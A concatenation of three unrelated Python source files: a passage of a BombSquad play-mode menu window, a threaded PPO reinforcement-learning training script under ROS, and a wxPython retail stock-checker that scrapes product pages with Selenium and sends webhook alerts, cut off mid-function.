left_widget=_ba.get_special_widget('back_button'))
ba.widget(edit=btn,
up_widget=_ba.get_special_widget('account_button'))
ba.widget(
edit=btn,
down_widget=_ba.get_special_widget('settings_button'))
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(140, 30),
color=(0.72, 0.4, 1.0))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(185, 53),
color=(0.71, 0.5, 1.0))
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(220, 27),
color=(0.67, 0.44, 1.0))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(255, 57),
color=(0.7, 0.3, 1.0))
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * 230, v + scl * 153),
size=(scl * 115, scl * 115),
texture=self._lineup_tex,
model_transparent=angry_computer_transparent_model)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + scl * 95),
size=(scl * button_width, scl * 50),
text=ba.Lstr(
resource='playModes.singlePlayerCoopText',
fallback_resource='playModes.coopText'),
maxwidth=scl * button_width * 0.7,
res_scale=1.5,
h_align='center',
v_align='center',
color=(0.7, 0.9, 0.7, 1.0),
scale=scl * 2.3)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + (scl * 54)),
size=(scl * button_width, scl * 30),
text=ba.Lstr(resource=self._r +
'.oneToFourPlayersText'),
h_align='center',
v_align='center',
scale=0.83 * scl,
flatness=1.0,
maxwidth=scl * button_width * 0.7,
color=clr)
scl = 0.5 if self._is_main_menu else 0.68
hoffs += 440 if self._is_main_menu else 216
v += 180 if self._is_main_menu else -68
self._teams_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(hoffs, v + (scl * 15 if self._is_main_menu else 0)),
size=(scl * button_width,
scl * (300 if self._is_main_menu else 360)),
extra_touch_border_scale=0.1,
autoselect=True,
label='',
button_type='square',
text_scale=1.13,
on_activate_call=self._team_tourney)
if ba.app.ui.use_toolbars:
ba.widget(edit=btn,
up_widget=_ba.get_special_widget('tickets_plus_button'),
right_widget=_ba.get_special_widget('party_button'))
xxx = -14
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 148, 30),
color=(0.2, 0.4, 1.0))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 181, 53),
color=(0.3, 0.4, 1.0))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 216, 33),
color=(0.3, 0.5, 1.0))
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 245, 57),
color=(0.3, 0.5, 1.0))
xxx = 155
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 151, 30),
color=(1.0, 0.5, 0.4))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 189, 53),
color=(1.0, 0.58, 0.58))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 223, 27),
color=(1.0, 0.5, 0.5))
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 257, 57),
color=(1.0, 0.5, 0.5))
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + scl * 95),
size=(scl * button_width, scl * 50),
text=ba.Lstr(resource='playModes.teamsText',
fallback_resource='teamsText'),
res_scale=1.5,
maxwidth=scl * button_width * 0.7,
h_align='center',
v_align='center',
color=(0.7, 0.9, 0.7, 1.0),
scale=scl * 2.3)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + (scl * 54)),
size=(scl * button_width, scl * 30),
text=ba.Lstr(resource=self._r +
'.twoToEightPlayersText'),
h_align='center',
v_align='center',
res_scale=1.5,
scale=0.9 * scl,
flatness=1.0,
maxwidth=scl * button_width * 0.7,
color=clr)
hoffs += 0 if self._is_main_menu else 300
v -= 155 if self._is_main_menu else 0
self._free_for_all_button = btn = ba.buttonwidget(
parent=self._root_widget,
position=(hoffs, v + (scl * 15 if self._is_main_menu else 0)),
size=(scl * button_width,
scl * (300 if self._is_main_menu else 360)),
extra_touch_border_scale=0.1,
autoselect=True,
label='',
button_type='square',
text_scale=1.13,
on_activate_call=self._free_for_all)
xxx = -5
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 140, 30),
color=(0.4, 1.0, 0.4))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 185, 53),
color=(1.0, 0.4, 0.5))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 220, 27),
color=(0.4, 0.5, 1.0))
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 255, 57),
color=(0.5, 1.0, 0.4))
xxx = 140
self._draw_dude(2,
btn,
hoffs,
v,
scl,
position=(xxx + 148, 30),
color=(1.0, 0.9, 0.4))
self._draw_dude(0,
btn,
hoffs,
v,
scl,
position=(xxx + 182, 53),
color=(0.7, 1.0, 0.5))
self._draw_dude(3,
btn,
hoffs,
v,
scl,
position=(xxx + 233, 27),
color=(0.7, 0.5, 0.9))
self._draw_dude(1,
btn,
hoffs,
v,
scl,
position=(xxx + 266, 53),
color=(0.4, 0.5, 0.8))
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + scl * 95),
size=(scl * button_width, scl * 50),
text=ba.Lstr(resource='playModes.freeForAllText',
fallback_resource='freeForAllText'),
maxwidth=scl * button_width * 0.7,
h_align='center',
v_align='center',
color=(0.7, 0.9, 0.7, 1.0),
scale=scl * 1.9)
ba.textwidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (-10), v + (scl * 54)),
size=(scl * button_width, scl * 30),
text=ba.Lstr(resource=self._r +
'.twoToEightPlayersText'),
h_align='center',
v_align='center',
scale=0.9 * scl,
flatness=1.0,
maxwidth=scl * button_width * 0.7,
color=clr)
if ba.app.ui.use_toolbars and uiscale is ba.UIScale.SMALL:
back_button.delete()
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._back,
selected_child=self._coop_button
if self._is_main_menu else self._teams_button)
else:
ba.buttonwidget(edit=back_button, on_activate_call=self._back)
ba.containerwidget(edit=self._root_widget,
cancel_button=back_button,
selected_child=self._coop_button
if self._is_main_menu else self._teams_button)
self._restore_state()
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
import bastd.ui.mainmenu as _unused1
import bastd.ui.account as _unused2
import bastd.ui.coop.browser as _unused3
import bastd.ui.playlist.browser as _unused4
def _back(self) -> None:
# pylint: disable=cyclic-import
if self._is_main_menu:
from bastd.ui.mainmenu import MainMenuWindow
self._save_state()
ba.app.ui.set_main_menu_window(
MainMenuWindow(transition='in_left').get_root_widget())
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
else:
from bastd.ui.gather import GatherWindow
self._save_state()
ba.app.ui.set_main_menu_window(
GatherWindow(transition='in_left').get_root_widget())
ba.containerwidget(edit=self._root_widget,
transition=self._transition_out)
def _coop(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
from bastd.ui.coop.browser import CoopBrowserWindow
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
CoopBrowserWindow(
origin_widget=self._coop_button).get_root_widget())
def _team_tourney(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.playlist.browser import PlaylistBrowserWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PlaylistBrowserWindow(
origin_widget=self._teams_button,
sessiontype=ba.DualTeamSession).get_root_widget())
def _free_for_all(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.playlist.browser import PlaylistBrowserWindow
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
ba.app.ui.set_main_menu_window(
PlaylistBrowserWindow(
origin_widget=self._free_for_all_button,
sessiontype=ba.FreeForAllSession).get_root_widget())
def _draw_dude(self, i: int, btn: ba.Widget, hoffs: float, v: float,
scl: float, position: Tuple[float, float],
color: Tuple[float, float, float]) -> None:
h_extra = -100
v_extra = 130
eye_color = (0.7 * 1.0 + 0.3 * color[0], 0.7 * 1.0 + 0.3 * color[1],
0.7 * 1.0 + 0.3 * color[2])
if i == 0:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 60, scl * 80),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_1_transparent_model)
ba.imagewidget(
parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 12),
v + scl * (v_extra + position[1] + 53)),
size=(scl * 36, scl * 18),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
elif i == 1:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 45, scl * 90),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_2_transparent_model)
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 5),
v + scl * (v_extra + position[1] + 67)),
size=(scl * 32, scl * 16),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
elif i == 2:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 45, scl * 90),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_3_transparent_model)
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 5),
v + scl * (v_extra + position[1] + 59)),
size=(scl * 34, scl * 17),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
elif i == 3:
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0]),
v + scl * (v_extra + position[1])),
size=(scl * 48, scl * 96),
color=color,
texture=self._lineup_tex,
model_transparent=self._lineup_4_transparent_model)
ba.imagewidget(parent=self._root_widget,
draw_controller=btn,
position=(hoffs + scl * (h_extra + position[0] + 2),
v + scl * (v_extra + position[1] + 62)),
size=(scl * 38, scl * 19),
texture=self._lineup_tex,
color=eye_color,
model_transparent=self._eyes_model)
def _save_state(self) -> None:
try:
sel = self._root_widget.get_selected_child()
if sel == self._teams_button:
sel_name = 'Team Games'
elif self._coop_button is not None and sel == self._coop_button:
sel_name = 'Co-op Games'
elif sel == self._free_for_all_button:
sel_name = 'Free-for-All Games'
elif sel == self._back_button:
sel_name = 'Back'
else:
raise ValueError(f'unrecognized selection {sel}')
ba.app.ui.window_states[type(self)] = sel_name
except Exception:
ba.print_exception(f'Error saving state for {self}.')
def _restore_state(self) -> None:
try:
sel_name = ba.app.ui.window_states.get(type(self))
if sel_name == 'Team Games':
sel = self._teams_button
elif sel_name == 'Co-op Games' and self._coop_button is not None:
sel = self._coop_button
elif sel_name == 'Free-for-All Games':
sel = self._free_for_all_button
elif sel_name == 'Back':
sel = self._back_button
else:
sel = (self._coop_button if self._coop_button is not None else
self._teams_button)
ba.containerwidget(edit=self._root_widget, selected_child=sel)
except Exception:
ba.print_exception(f'Error restoring state for {self}.')
|
PPO_run.py
|
#!/usr/bin/env python3
import threading, queue
import time
import os
import shutil
import numpy as np
import math
import rospy
from ppo import PPO
from env_v5 import Test
MAX_EPISODES = 100000
MAX_EP_STEPS = 400
MEMORY_CAPACITY = 10000
SIDE = ['right_', 'left_']
GOAL_REWARD = 1500
LOAD = False
def train(nameIndx):
global left_run, right_run
T_REWARD = []
MU_REWARD = 0
BEST_R = 0
env = Test(nameIndx) #0 = right
# agent = DDPG(a_dim, s_dim, a_bound, SIDE[nameIndx])
agent = PPO(act_dim=8, obs_dim=39,
lr_actor=0.0001, lr_value=0.0002, gamma=0.9, clip_range=0.2, name=SIDE[nameIndx])
var = 0.8 # control exploration
rar = 0.3
cnt = 0
t1 = time.time()
while int(time.time())%5 != 0:
nameIndx = nameIndx
for i in range(MAX_EPISODES):
while right_run or left_run:
nameIndx = nameIndx
s = env.reset()
while int(time.time())%2 != 0:
nameIndx = nameIndx
if nameIndx == 0:
right_run = True
elif nameIndx == 1:
left_run = True
ep_reward = 0
for j in range(MAX_EP_STEPS):
a, neglogp, _ = agent.choose_action(s)
# a = np.clip(np.random.normal(a, var), -1, 1) # add randomness to action selection for exploration
s_, r, done, info = env.step(a)
agent.memory.store_transition(s, a, (r+8)/8, neglogp)
if (j + 1) % 32 == 0 or j == MAX_EP_STEPS - 1:
_, _, last_value = agent.choose_action(s_)
agent.learn(last_value, done, cnt)
s = s_
ep_reward += r
cnt+=1
if len(T_REWARD) >= 100:
T_REWARD.pop(0)
T_REWARD.append(ep_reward)
r_sum = 0
for k in T_REWARD:
r_sum += k
MU_REWARD = r_sum/100
BEST_R = MU_REWARD if MU_REWARD>BEST_R else BEST_R
print('Episode:', i, ' Reward: %i' % int(ep_reward), 'MU_REWARD: ', int(MU_REWARD),'BEST_R: ', int(BEST_R), 'cnt = ',j)# , 't_step:', int(t23), 't_learn: ', int(t32)) #'var: %.3f' % var, 'rar: %.3f' % rar)
if MU_REWARD > GOAL_REWARD:
break
if nameIndx == 0:
right_run = False
elif nameIndx == 1:
left_run = False
if os.path.isdir(agent.path): shutil.rmtree(agent.path)
os.mkdir(agent.path)
ckpt_path = os.path.join(agent.path, 'DDPG.ckpt')
save_path = agent.saver.save(agent.sess, ckpt_path, write_meta_graph=False)
print("\nSave Model %s\n" % save_path)
print('Running time: ', time.time() - t1)
def action_sample(s):
a = s[8:16]
a[:3] /= np.linalg.norm(a[:3])
a[3:7]/= np.linalg.norm(a[3:7])
a[7] /= math.fabs(a[7])
a[:3] *= s[-3]
a[3:7]*= s[-2]
a[7] *= s[-1]
return a
if __name__ == '__main__':
rospy.init_node('a')
threads = []
left_run = False
right_run = False
for i in range(2):
t = threading.Thread(target=train, args=(i,))
threads.append(t)
for i in range(2):
threads[i].start()
|
gui.py
|
#!/usr/bin/python3
# https://github.com/tnware/product-checker
# by Tyler Woods
# coded for Bird Bot and friends
# https://tylermade.net
# -*- coding: utf-8 -*-
import wx
import wx.xrc
import json
import requests
import time
from datetime import datetime
import urllib.parse as urlparse
from urllib.parse import parse_qs
from threading import Thread
from selenium import webdriver
from chromedriver_py import binary_path as driver_path
from lxml import html
# Set maxprice to 0 for the default (no price cap), or to a plain integer (e.g. 300, no quotes)
# to ignore any listing priced above that amount.
# Currently this only applies to Walmart URLs.
#maxprice = 300
maxprice = 0
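# Illustrative helper (a hedged sketch, not called anywhere in this file): it mirrors the
# price-cap check applied in the Walmart handler further below -- an alert fires only when
# maxprice is 0 (no cap) or the parsed price does not exceed maxprice.
def _price_within_cap(price, cap=maxprice):
    return cap == 0 or int(price) <= cap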
###########################################################################
## Class WebhookManager
###########################################################################
class WebhookManager ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Manage Webhooks", pos = wx.DefaultPosition, size = wx.Size( 354,199 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
outer = wx.BoxSizer( wx.VERTICAL )
self.panel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
box = wx.BoxSizer( wx.HORIZONTAL )
self.btnPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
btnbox = wx.BoxSizer( wx.VERTICAL )
self.newBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"New", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.newBtn, 0, wx.ALL, 5 )
self.renBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Update", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.renBtn, 0, wx.ALL, 5 )
self.delBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Delete", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.delBtn, 0, wx.ALL, 5 )
self.clrBtn = wx.Button( self.btnPanel, wx.ID_ANY, u"Clear All", wx.DefaultPosition, wx.DefaultSize, 0 )
btnbox.Add( self.clrBtn, 0, wx.ALL, 5 )
self.btnPanel.SetSizer( btnbox )
self.btnPanel.Layout()
btnbox.Fit( self.btnPanel )
box.Add( self.btnPanel, 0, wx.EXPAND |wx.ALL, 5 )
self.listPanel = wx.Panel( self.panel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
lstbox = wx.BoxSizer( wx.VERTICAL )
#webhookListChoices = []
self.webhookList = wx.ListBox( self.listPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, webhookListChoices, 0 )
lstbox.Add( self.webhookList, 1, wx.ALL|wx.EXPAND, 5 )
self.listPanel.SetSizer( lstbox )
self.listPanel.Layout()
lstbox.Fit( self.listPanel )
box.Add( self.listPanel, 1, wx.EXPAND |wx.ALL, 5 )
self.panel.SetSizer( box )
self.panel.Layout()
box.Fit( self.panel )
outer.Add( self.panel, 1, wx.EXPAND, 5 )
self.SetSizer( outer )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.newBtn.Bind( wx.EVT_BUTTON, self.NewItem )
self.renBtn.Bind( wx.EVT_BUTTON, self.OnUpdate )
self.delBtn.Bind( wx.EVT_BUTTON, self.OnDelete )
self.clrBtn.Bind( wx.EVT_BUTTON, self.OnClear )
def __del__( self ):
pass
def NewItem(self, event):
webhook_dict = return_data("./data/webhooks.json")
webhook_url = wx.GetTextFromUser('Enter a Webhook URL', 'Insert dialog')
if webhook_url != '':
webhook_name = wx.GetTextFromUser('Give the webhook URL a friendly name', 'Insert dialog')
self.webhookList.Append(webhook_name)
set_data("./data/webhooks.json", webhook_name, webhook_url)
webhook_dict = return_data("./data/webhooks.json")
webhookListChoices.append(webhook_name)
def OnUpdate(self, event):
webhook_dict = return_data("./data/webhooks.json")
sel = self.webhookList.GetSelection()
text = self.webhookList.GetString(sel)
webhook_to_modify = webhook_dict[text]
modified_webhook_url = wx.GetTextFromUser('Update item', 'Update Item dialog', webhook_to_modify)
if modified_webhook_url != '':
webhook_dict.update({text: modified_webhook_url})
set_data("./data/webhooks.json", text, modified_webhook_url)
webhook_dict = return_data("./data/webhooks.json")
#self.webhookList.Delete(sel)
#item_id = self.webhookList.Insert(renamed, sel)
#self.webhookList.SetSelection(item_id)
def OnDelete(self, event):
webhook_dict = return_data("./data/webhooks.json")
sel = self.webhookList.GetSelection()
text = self.webhookList.GetString(sel)
if sel != -1:
self.webhookList.Delete(sel)
del webhook_dict[text]
with open("./data/webhooks.json", "w") as file:
json.dump(webhook_dict, file)
file.close()
webhook_dict = return_data("./data/webhooks.json")
def OnClear(self, event):
self.webhookList.Clear()
with open("./data/webhooks.json", "w") as file:
json.dump({}, file)
file.close()
webhook_dict = return_data("./data/webhooks.json")
###########################################################################
## Class WebhookDialog
###########################################################################
class WebhookDialog ( wx.Dialog ):
def __init__( self, parent ):
wx.Dialog.__init__ ( self, parent, id = wx.ID_ANY, title = u"Assign Webhook", pos = wx.DefaultPosition, size = wx.Size( 201,103 ), style = wx.DEFAULT_DIALOG_STYLE )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
vbox = wx.BoxSizer( wx.VERTICAL )
self.pnl = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox.Add( self.pnl, 1, wx.EXPAND |wx.ALL, 5 )
comboChoices = []
self.combo = wx.ComboBox( self, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.DefaultSize, comboChoices, 0 )
vbox.Add( self.combo, 0, wx.ALL|wx.EXPAND, 5 )
self.okButton = wx.Button( self, wx.ID_ANY, u"Okay", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox.Add( self.okButton, 0, wx.ALL|wx.EXPAND, 5 )
self.SetSizer( vbox )
self.Layout()
self.Centre( wx.BOTH )
# Connect Events
self.okButton.Bind( wx.EVT_BUTTON, self.update )
webhook_dict = return_data("./data/webhooks.json")
for k in webhook_dict:
self.combo.Append(k)
def update(self, e):
try:
selected = ex.list.GetFocusedItem()
i = selected
url = ex.list.GetItemText(i, col=0)
new_webhook_key = self.combo.GetSelection()
new_webhook = self.combo.GetString(new_webhook_key)
if new_webhook != "":
print(url, new_webhook)
urldict.update({url: new_webhook})
set_data("./data/products.json", url, new_webhook)
ex.list.SetItem(i, 1, new_webhook)
num = ex.list.GetItemCount()
else:
print("select a webhook first")
except:
print("An error ocurred. Did you select a URL before clicking Edit?")
self.Close()
self.Close()
def OnClose(self, e):
self.Destroy()
def __del__( self ):
pass
###########################################################################
## Class GUI
###########################################################################
class GUI ( wx.Frame ):
def __init__( self, parent ):
wx.Frame.__init__ ( self, parent, id = wx.ID_ANY, title = u"Product Checker", pos = wx.DefaultPosition, size = wx.Size( 1009,660 ), style = wx.DEFAULT_FRAME_STYLE|wx.TAB_TRAVERSAL )
self.SetSizeHints( wx.DefaultSize, wx.DefaultSize )
hbox = wx.BoxSizer( wx.HORIZONTAL )
self.leftPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox2 = wx.BoxSizer( wx.VERTICAL )
self.icon = wx.StaticBitmap( self.leftPanel, wx.ID_ANY, wx.Bitmap( u"img/icon.png", wx.BITMAP_TYPE_ANY ), wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.icon, 0, wx.ALL|wx.EXPAND, 15 )
self.whBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Manage Webhooks", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.whBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.addBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Add Product URL", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.addBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.editBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Edit Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.editBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.delBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"Delete Highlighted Item", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.delBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.strtAllBtn = wx.Button( self.leftPanel, wx.ID_ANY, u"START All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.strtAllBtn, 0, wx.ALL|wx.EXPAND, 5 )
self.app2Btn = wx.Button( self.leftPanel, wx.ID_ANY, u"STOP All Jobs", wx.DefaultPosition, wx.DefaultSize, 0 )
vbox2.Add( self.app2Btn, 0, wx.ALL|wx.EXPAND, 5 )
vbox2.Add( ( 0, 0), 1, wx.EXPAND, 5 )
self.leftPanel.SetSizer( vbox2 )
self.leftPanel.Layout()
vbox2.Fit( self.leftPanel )
hbox.Add( self.leftPanel, 0, wx.EXPAND, 5 )
self.rightPanel = wx.Panel( self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.TAB_TRAVERSAL )
vbox = wx.BoxSizer( wx.VERTICAL )
self.list = wx.ListCtrl( self.rightPanel, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LC_REPORT )
vbox.Add( self.list, 1, wx.ALL|wx.EXPAND, 5 )
self.log = wx.TextCtrl( self.rightPanel, wx.ID_ANY, wx.EmptyString, wx.DefaultPosition, wx.Size( -1,200 ), wx.TE_MULTILINE|wx.TE_READONLY )
vbox.Add( self.log, 0, wx.ALL|wx.EXPAND, 5 )
self.rightPanel.SetSizer( vbox )
self.rightPanel.Layout()
vbox.Fit( self.rightPanel )
hbox.Add( self.rightPanel, 1, wx.EXPAND, 5 )
self.SetSizer( hbox )
self.Layout()
self.statusBar = self.CreateStatusBar( 1, wx.STB_SIZEGRIP, wx.ID_ANY )
self.m_menubar1 = wx.MenuBar( 0 )
self.menuFile = wx.Menu()
self.exitItem = wx.MenuItem( self.menuFile, wx.ID_ANY, u"Exit", wx.EmptyString, wx.ITEM_NORMAL )
self.menuFile.Append( self.exitItem )
self.m_menubar1.Append( self.menuFile, u"File" )
self.menuHelp = wx.Menu()
self.m_menubar1.Append( self.menuHelp, u"Help" )
self.SetMenuBar( self.m_menubar1 )
self.Centre( wx.BOTH )
# Connect Events
self.whBtn.Bind( wx.EVT_BUTTON, self.OnManageWebhooks )
self.addBtn.Bind( wx.EVT_BUTTON, self.AddURLs )
self.editBtn.Bind( wx.EVT_BUTTON, self.OnChangeWebhook )
self.delBtn.Bind( wx.EVT_BUTTON, self.DeleteURL )
self.strtAllBtn.Bind( wx.EVT_BUTTON, self.OnRunAll )
self.app2Btn.Bind( wx.EVT_BUTTON, self.StopAll )
self.Bind( wx.EVT_MENU, self.OnClose, id = self.exitItem.GetId() )
def __del__( self ):
pass
def CheckURLs(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.IsChecked(i):
if ex.list.GetItemText(i, col=2) == "Inactive":
url = ex.list.GetItemText(i, col=0)
hook = ex.list.GetItemText(i, col=1)
RunJob(url, hook, i)
else:
if ex.list.GetItemText(i, col=2) != "Inactive":
ex.list.SetItem(i, 2, "Stopping")
colour = wx.Colour(255, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
def RunAll(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.GetItemText(i, col=2) == "Inactive":
url = ex.list.GetItemText(i, col=0)
hook = ex.list.GetItemText(i, col=1)
RunJob(url, hook, i)
def StopAll(self, event):
num = ex.list.GetItemCount()
for i in range(num):
if ex.list.GetItemText(i, col=2) != "Inactive":
ex.list.SetItem(i, 2, "Stopping")
colour = wx.Colour(255, 0, 0, 255)
ex.list.SetItemTextColour(i, colour)
def AddURLs(self, event):
urldict = return_data("./data/products.json")
product_url = wx.GetTextFromUser('Enter a Product URL', 'Insert dialog')
product_webhook = "None"
num = ex.list.GetItemCount()
idx = (num + 1)
if product_url != '':
index = ex.list.InsertItem(idx, product_url)
ex.list.SetItem(index, 1, "None")
ex.list.SetItem(index, 2, "Inactive")
idx += 1
set_data("./data/products.json", product_url, product_webhook)
urldict = return_data("./data/products.json")
def DeleteURL(self, event):
urldict = return_data("./data/products.json")
selected = ex.list.GetFocusedItem()
text = ex.list.GetItemText(selected, col=0)
if selected != -1:
ex.list.DeleteItem(selected)
del urldict[text]
with open("./data/products.json", "w") as file:
json.dump(urldict, file)
file.close()
urldict = return_data("./data/products.json")
def OnChangeWebhook(self, e):
webhook_dict = return_data("./data/webhooks.json")
selected = ex.list.GetFocusedItem()
if selected != -1:
whDialog = WebhookDialog(None)
whDialog.ShowModal()
whDialog.Destroy()
def OnManageWebhooks(self, e):
webhook_dict = return_data("./data/webhooks.json")
global webhookListChoices
webhookListChoices = []
for k in webhook_dict:
webhookListChoices.append(k)
whManager = WebhookManager(None)
whManager.Show()
def OnClose(self, e):
self.Destroy()
def OnSelectAll(self, event):
num = self.list.GetItemCount()
for i in range(num):
self.list.CheckItem(i)
def OnDeselectAll(self, event):
num = self.list.GetItemCount()
for i in range(num):
self.list.CheckItem(i, False)
def OnApply(self, event):
ex.log.AppendText("Processing Selections..." + '\n')
t = Thread(target=self.CheckURLs, args=(self,))
t.start()
def OnRunAll(self, event):
for url in urldict:
stockdict.update({url: 'False'})
ex.log.AppendText("Processing Selections..." + '\n')
t = Thread(target=self.RunAll, args=(self,))
t.start()
###########################################################################
## Custom init
###########################################################################
def return_data(path):
with open(path,"r") as file:
data = json.load(file)
file.close()
return data
def write_data(path,data):
with open(path, "w") as file:
json.dump(data, file)
file.close()
def set_data(path, val1, val2):
data = return_data(path)
data.update({val1: val2})
write_data(path, data)
class Amazon:
def __init__(self, url, hook):
self.url = url
self.hook = hook
webhook_url = webhook_dict[hook]
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_argument('log-level=3')
options.add_argument('--ignore-certificate-errors')
options.add_argument('--user-agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36"')
options.add_argument("headless")
driver = webdriver.Chrome(executable_path=driver_path, chrome_options=options)
driver.get(url)
html = driver.page_source
if "To discuss automated access to Amazon data please contact api-services-support@amazon.com." in html:
print("Amazon's Bot Protection is preventing this call.")
ex.log.AppendText("Amazon's Bot Protection prevented a refresh." + '\n')
else:
status_raw = driver.find_element_by_xpath("//div[@id='olpOfferList']")
status_text = status_raw.text
title_raw = driver.find_element_by_xpath("//h1[@class='a-size-large a-spacing-none']")
title_text = title_raw.text
title = title_text
img_raw = driver.find_element_by_xpath("//div[@id='olpProductImage']//img")
img = img_raw.get_attribute('src')
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
if "Currently, there are no sellers that can deliver this item to your location." not in status_text:
print("[" + current_time + "] " + "In Stock: (Amazon.com) " + title + " - " + url)
slack_data = {
'username': "Amazon Bot",
'avatar_url': "https://github.com/tnware/product-checker/raw/master/img/amazon.png",
'content': "Amazon Stock Alert:",
'embeds': [{
'title': title,
'description': title + " in stock on Amazon",
'url': url,
"fields": [
{
"name": "Time:",
"value": current_time
},
{
"name": "Status:",
"value": "In Stock"
}
],
'thumbnail': {
'url': img
}
}]
}
